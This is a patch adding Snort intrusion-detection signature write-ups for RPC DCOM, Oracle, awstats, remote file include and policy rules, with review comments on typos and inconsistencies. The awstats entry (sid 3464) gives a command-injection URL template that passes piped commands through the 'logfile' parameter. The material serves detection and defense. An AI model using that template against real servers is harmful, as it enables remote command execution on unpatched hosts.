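Review bot: the Detailed Information paragraph has been hard-wrapped mid-word ("sent t / o access", "urico / ntent", "incl / ude"), and that is exactly what will be written to doc/signatures/2394.txt; rewrap it at word boundaries. The note about using "content" instead of "uricontent" is a useful operational caveat, but the better fix is to add port 2301 to the http_inspect_server ports so the URI is normalized before matching, otherwise encoded variants of "<!" will be missed; say so. The "--" separator before "Additional References:" is missing, "Host running" should be "Hosts running", and Attack Scenarios says the "system" crashes while the rest of the file says the service does.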
--- /dev/null
+++ b/doc/signatures/3363.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3363
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
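Review bot: identical text to 3355.txt, with the same inconsistency: Attack Scenarios describes an overlong filename requested "via a network share" while Detailed Information describes a malformed DCOM request to an RPC port. Reconcile them, cite the Microsoft bulletin and CVE in the empty Additional References section, and fix "Expoit" (Exploit).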
--- /dev/null
+++ b/doc/signatures/2731.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2731
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_unique_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
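Review bot: same points as 2850.txt: note in Ease of Attack that a database session with execute privilege on dbms_repcat is required, add revoking EXECUTE on dbms_repcat from non-replication users to Corrective Action, join "add_unique_resolution" with the ". This procedure" that follows it, and change "Oracle Oracle9i" to "Oracle9i".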
--- /dev/null
+++ b/doc/signatures/1865.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1865
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
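Review bot: as with 1479.txt, the description does not say which CGI script sid 1865 matches, the credential-validation boilerplate describes no specific vulnerability, Additional References is empty, and "running ona web server" should read "on a".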
--- /dev/null
+++ b/doc/signatures/2544.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2544
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
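Review bot: Additional References should cite the Microsoft bulletin behind TA04-104A, MS04-011, and the CVE for the SSL library denial of service, CVE-2004-0120, so the event can be matched to patch status; the affected component is Microsoft's Secure Channel (Schannel) library, which is worth naming since it is what the patch updates. Fix "An attcker" (attacker) and order the affected systems consistently ("2000, XP and 2003").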
--- /dev/null
+++ b/doc/signatures/2296.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2296
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
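Review bot: Attack Scenarios (an attacker supplying credentials to an authentication mechanism) does not match Detailed Information, which describes an input-handling flaw allowing PHP code execution and file inclusion; rewrite the scenario around the actual vector, name the script and parameter the rule matches on, and cite the Advanced Poll 2.0.2 advisory in the empty Additional References section.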
--- /dev/null
+++ b/doc/signatures/3404.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3404
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
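Review bot: the Attack Scenarios paragraph contradicts the Detailed Information in this hunk: Detailed Information describes a malformed DCOM request sent over RPC, while Attack Scenarios says "An attacker may make a request for a file with an overly long filename via a network share", which is a different vector; keep the one the rule actually detects. Also "Expoit" under Ease of Attack should be "Exploit".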
--- /dev/null
+++ b/doc/signatures/3464.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3464
+
+--
+Summary:
+This event is generated when an attempt is made to execute system
+commands via the cgi script awstats.pl.
+
+--
+Impact:
+Possible execution of system commands.
+
+--
+Detailed Information:
+Adavanced Web Statistics (awstats) is used to process web server log
+files and produces reports of web server usage.
+
+Some versions of awstats do not correctly sanitize user input. This may
+present an attacker with the opportunity to supply system commands via
+the "logfile" parameter. For the attack to be sucessful the "update"
+parameter must also have the value set to "1". This event indicates that
+an attempt has been made to pass a system command as a value to the
+"logfile" parameter the awstats.pl cgi script.
+
+--
+Affected Systems:
+	Awstats 6.1 and prior
+
+--
+Attack Scenarios:
+An attacker can supply commands of their choosing as a value for the
+logfile parameter by enclosing the commands in pipe charecters. For
+example: 
+
+ http://www.foo.com/cgi-bin/awstats.pl?update=1&logfile=|<command here>|
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+Disallow access to awstats.pl as a CGI script.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
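Review bot: spelling errors in this hunk: "Adavanced Web Statistics" (Advanced), "sucessful" (successful), "charecters" (characters), and the sentence "as a value to the "logfile" parameter the awstats.pl cgi script" is missing "of" before "the awstats.pl". Since Detailed Information states that exploitation also requires the "update" parameter to be "1", Corrective Action could mention disabling statistics updates from the browser in the awstats configuration as a less drastic measure than removing CGI access to awstats.pl altogether.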
--- /dev/null
+++ b/doc/signatures/717.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+717
+
+--
+Summary:
+This event is generated when a failed remote telnet connection occurs using the root account.
+
+--
+Impact:
+Failed root access.  This event indicates that an attacker tried an failed to connect to a telnet server using the root account.
+
+
+--
+Detailed Information:
+Telnet servers can be configured to disallow connections using the root account.  If root privileges are required, the root user must log on to the telnet server's console directly.  A failed telnet connection using the root account will generate an error message. 
+
+--
+Affected Systems:
+Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to log on to a telnet server using the root account.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+Disable root logins using telnet.
+
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original rule written by Ron Gula<rgula@tenablesecurity.com>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS365
+
+--
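Review bot: grammar in the Impact section: "tried an failed to connect" should read "tried and failed to connect". The Ease of Attack entry "Simple" lacks the terminating period used in the other documents, and there is a stray blank line between the Impact text and its separator.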
--- /dev/null
+++ b/doc/signatures/559.txt
@@ -0,0 +1,91 @@
+Rule:  
+
+--
+
+Sid:
+
+559
+
+--
+
+Summary:
+
+A network-external client has connected to an internal GNUTella server
+and issued a connect attempt to begin communications.
+
+--
+
+Impact:
+
+Possible policy violation; possible excess network load.
+
+--
+
+Detailed Information:
+
+GNUTella is a P2P (Peer-to-Peer) protocol for exchanging arbitrary
+files.  Depending on your site's policies, using it may be a policy
+violation.
+
+If not properly configured, GNUTella clients may accidentally share out
+confidential files.  GNUTella worms (which use deceptive names to
+encourage download) and viruses may also be accidentally downloaded by a
+client.
+
+This rule being triggered means that a GNUTella server has been detected
+on the protected network.
+
+--
+
+Affected Systems:
+
+Any system with a GNUTella client installed (available for most
+platforms)
+
+--
+
+Attack Scenarios:
+
+N/A
+
+--
+
+Ease of Attack:
+
+N/A
+
+--
+
+False Positives:
+
+This rule detects the term "GNUTELLA CONNECT" on all ports.  As a
+result, any email, web page, or other network content that discusses the
+protocol and its messages will trigger this alert.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Depends on acceptable use policies.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+
+--
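Review bot: the Summary, Detailed Information and Affected Systems in this hunk describe the detected host differently: "an internal GNUTella server", "a GNUTella server has been detected on the protected network", and "Any system with a GNUTella client installed"; since a Gnutella peer acts as both client and server, say so once so the reader knows which side of the connection the rule fires on. The contributor address "gene!AT!gomezbrothers!DOT!com" does not follow the <user@host> form used elsewhere in the patch, and the separator at the end of Contributors carries trailing whitespace.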
--- /dev/null
+++ b/doc/signatures/3094.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3094
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
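Review bot: the Affected Systems list in this hunk names "Microsoft Windows Server 2000"; the product is Windows 2000 Server, and the entry should match the naming used by the other documents in this patch ("Windows 2000"). Several separator lines are written "-- " with trailing whitespace instead of the plain "--" used elsewhere, and the Additional References section is empty.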
--- /dev/null
+++ b/doc/signatures/3211.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3211
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
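Review bot: this document is a verbatim copy of 3404.txt with only the Sid changed and carries the same defects: the Attack Scenarios text ("overly long filename via a network share") does not match the RPC DCOM description in Detailed Information, and "Expoit" under Ease of Attack is misspelled. Fix the shared text once and apply it to every copy in this patch (3163, 3211, 3359, 3404).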
--- /dev/null
+++ b/doc/signatures/1795.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1795
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "ejaculat".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "ejaculat".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
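Review bot: the Summary sentence "a webpage was visited the included the content" is ungrammatical; it should read "that included the content". The False Negatives entry lacks the blank line before its "--" separator that the other sections have, and the Additional References section is followed by six empty lines before the closing separator; trim them.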
--- /dev/null
+++ b/doc/signatures/2234.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2234
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
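Review bot: Detailed Information says "Versions of Trend Micro InterScan eManager suffer from a buffer overflow" without naming them, while Affected Systems lists only 3.51; state the affected version consistently in both places. The Corrective Action items "Disable the web interface" and "Enable NTLM authentication for the administrative interface" lack the terminating period used for the first item.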
--- /dev/null
+++ b/doc/signatures/415.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+415
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Information Reply datagram.
+
+--
+
+Impact:
+ICMP Information Reply datagrams contain the network number of the network segment the datagram was generated on.  This could be an indication of an improperly configured host attempting to locate the network number of the subnet it is located in.
+
+--
+
+Detailed Information:
+This message is generated in response to an ICMP Information Request Message.  Hosts that generated ICMP Information Request Messages are attempting to obtain the network number of subnet it is on.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 16 datagrams are not normal network activity.  Hosts generating ICMP Information Request messages or Information Reply Messages should be checked for configuration errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
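Review bot: this document is missing the Affected Systems section that every other document in this patch places between Detailed Information and Attack Scenarios. In Detailed Information, "Hosts that generated ICMP Information Request Messages are attempting to obtain the network number of subnet it is on" mixes plural and singular and is missing "the" before "subnet"; the Ease of Attack entry lists tools rather than rating ease; and the False Negatives entry lacks a blank line before its separator.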
--- /dev/null
+++ b/doc/signatures/3359.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3359
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
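Review bot: this document repeats 3404.txt word for word apart from the Sid, including the mismatch between Attack Scenarios ("overly long filename via a network share") and the RPC DCOM vector in Detailed Information, and the "Expoit" misspelling under Ease of Attack; correct the shared text in all four RPC DCOM documents (3163, 3211, 3359, 3404) rather than in one.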
--- /dev/null
+++ b/doc/signatures/3446.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3446
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
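Review bot: "false postives from occuring" appears twice (Summary and Detailed Information) and should read "false positives from occurring". Since the document states that this rule never generates an event on its own, naming the rules that depend on it would stop readers from disabling it when tuning their rule set.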
--- /dev/null
+++ b/doc/signatures/2058.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2058
+
+--
+Summary:
+vulnerability in MondoSearch.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Versions of MondoSearch prior to 4.4.5156 use a vulnerable version of a 
+cgi script named msmmask.exe. This script allows the attacker to view 
+the source of any file in a webservers root directory.
+
+--
+Affected Systems:
+MondoSearch versions prior to 4.4.5156.
+
+--
+Attack Scenarios:
+The attacker needs to access the msmmask.exe script and request a file 
+in the servers web directory.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade the application to at least version 4.4.5156 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11163
+
+--
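Review bot: the Summary in this hunk is truncated: it reads only "vulnerability in MondoSearch." and is missing the start of the sentence (compare the other documents: "This event is generated when an attempt is made to exploit a known ..."). Also "servers web directory" needs an apostrophe, and "at least version 4.4.5156 or higher" in Corrective Action is redundant.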
--- /dev/null
+++ b/doc/signatures/100000613.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000613
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_edit.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2940.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2940
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the Windows
+registry service via SMB. 
+
+--
+Impact:
+Serious. Remote administration of the Windows reqistry may be possible.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to bind to the Windows
+registry service via SMB across the network.
+
+It may be possible for an attacker to manipulate the Windows registry
+from a remote location. This could give the attacker administrative
+privileges on the target host as well as the opportunity to execute code
+of their choosing.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If the Windows registry is accessible via SMB the attacker can
+manipulate the operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
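Review bot: "reqistry" in the Impact line should be "registry", and "None Known." under False Negatives is capitalised differently from "None known." under False Positives. Corrective Action says "Disallow remote registry manipulation" without saying how; since the event is a bind to the registry service over SMB, a sentence on disabling the Remote Registry service or restricting which accounts may connect to it would make the advice actionable.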
--- /dev/null
+++ b/doc/signatures/100000354.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000354
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpBB-Amod" application running on a webserver. Access to the file "lang_activity.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
